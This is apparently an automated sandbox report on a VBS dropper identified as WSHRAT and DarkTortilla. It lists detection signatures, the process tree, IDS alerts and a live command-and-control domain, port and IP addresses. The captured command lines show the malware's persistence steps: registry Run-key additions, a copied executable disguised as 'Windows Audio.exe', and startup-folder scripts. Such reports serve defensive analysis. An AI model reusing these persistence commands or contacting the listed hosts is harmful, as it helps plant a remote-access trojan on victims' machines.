
Windows Analysis Report
ORDER-25013-67789543AX.vbs

Overview

General Information

Sample name: ORDER-25013-67789543AX.vbs
Analysis ID: 1665235
MD5: 6b05858262470682bdc3297c6641a3db
SHA1: 699d8a5aa6e559cc597db68a9125d804f1350b8a
SHA256: aba8289d1eacae0e2eac939d757b19a576667e4eb47c1d86cbee0ad73f0b3e1a
Tags: vbs, user-abuse_ch
Infos:

Detection

Malware family: WSHRat, DarkTortilla
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected WSHRat
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected WSHRAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to delay execution (extensive OutputDebugStringW loop)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • wscript.exe (PID: 7884 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7932 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 8028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\DPGLXM.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 8076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • wscript.exe (PID: 8096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\notepad.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • JaG.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Local\Temp\JaG.exe" MD5: ADF762BBB2C8BE6A9D74FA8D12061864)
            • cmd.exe (PID: 7900 cmdline: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 2408 cmdline: ping 127.0.0.1 -n 65 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • reg.exe (PID: 6096 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • cmd.exe (PID: 2136 cmdline: "cmd" /c ping 127.0.0.1 -n 72 > nul && copy "C:\Users\user\AppData\Local\Temp\JaG.exe" "C:\Users\user\Audio\Windows Audio.exe" && ping 127.0.0.1 -n 72 > nul && "C:\Users\user\Audio\Windows Audio.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 2236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 3380 cmdline: ping 127.0.0.1 -n 72 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • wscript.exe (PID: 652 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5872 cmdline: "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 6132 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Local\Temp\adobe.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
Name: Houdini, WSHRAT
Description: Houdini is a VBS-based RAT dating back to 2013. In the past it used to be wrapped in an .exe, but it started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.houdini

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Extracted malware configuration (WSHRAT): {"C2 url": "lee44.kozow.com", "Port": "6892", "Install folder": "%temp%"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security

Source | Rule | Description | Author
00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security
00000005.00000002.2290405716.00000000038D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security
00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security
00000005.00000002.2287943742.00000000027D2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
(5 of 28 entries shown)

Source | Rule | Description | Author
5.2.JaG.exe.4c30000.1.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
5.2.JaG.exe.38d1a10.0.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
5.2.JaG.exe.4c30000.1.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
5.2.JaG.exe.38d1a10.0.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security

Source | Rule | Description | Author
amsi64_8076.amsi.csv | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security
amsi64_5872.amsi.csv | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security
amsi64_480.amsi.csv | JoeSecurity_WSHRAT | Yara detected WSHRAT | Joe Security

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 104.168.7.12, DestinationIsIpv6: false, DestinationPort: 6892, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49717
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , ProcessId: 7932, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rHMh.js" , ProcessId: 7932, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ProcessId: 7884, ProcessName: wscript.exe
Source: File created | Author: Tim Shelton | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Local\Temp\rHMh.js
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Audio\Windows Audio.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg.exe
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7900, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ProcessId: 6096, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JaG.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JaG.exe, ParentProcessId: 8168, ParentProcessName: JaG.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 65 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg.exe" /t REG_SZ /d "C:\Users\user\Audio\Windows Audio.exe", ProcessId: 7900, ProcessName: cmd.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 172.245.208.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7932, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49716
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-25013-67789543AX.vbs", ProcessId: 7884, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 8076, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adobe.js

Persistence and Installation Behavior

Source: Registry Key set | Author: Joe Security | Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\adobe.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-15T12:35:34.136315+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:39.498219+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49718 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:44.998596+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49725 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:50.316032+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49726 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:54.043709+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49727 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:58.765901+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49728 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:59.419689+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49729 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:04.498367+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:04.735249+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:09.856223+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:10.046901+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:15.156468+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:15.338671+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:20.471293+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:23.957380+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:29.345942+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:29.347964+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:34.660930+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:34.722463+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:39.964927+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:40.056719+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:45.266532+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:45.376709+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:54.017418+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:54.025394+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:59.329775+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:59.391943+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:04.660579+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:04.740778+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:10.079567+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:10.138169+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:15.394057+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:15.471862+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:23.834702+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:23.839817+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:29.151615+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:29.196725+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:34.473351+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:34.540511+0200 | 2027447 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 104.168.7.12 | 6892 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-15T12:35:34.136315+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:39.498219+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49718 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:44.998596+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49725 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:50.316032+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49726 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:54.043709+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49727 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:58.765901+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49728 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:35:59.419689+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49729 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:04.498367+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:04.735249+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:09.856223+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:10.046901+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:15.156468+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:15.338671+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:20.471293+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:23.957380+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:29.345942+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:29.347964+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:34.660930+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:34.722463+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:39.964927+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:40.056719+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:45.266532+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:45.376709+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:54.017418+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:54.025394+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:59.329775+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:36:59.391943+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:04.660579+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:04.740778+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:10.079567+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:10.138169+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:15.394057+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:15.471862+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:23.834702+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:23.839817+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:29.151615+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:29.196725+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:34.473351+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 104.168.7.12 | 6892 | TCP
2025-04-15T12:37:34.540511+0200 | 2017516 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 104.168.7.12 | 6892 | TCP


                            AV Detection

                            barindex
                            Source: http://lee44.kozow.com:6892/is-readyVAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readybe.TARM~1Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyLAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyParrsAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready6-A4xAvira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-ready813S8R | Avira URL Cloud: Label: phishing
                            Source: http://lee44.kozow.com:6892/is-readyO | Avira URL Cloud: Label: phishing
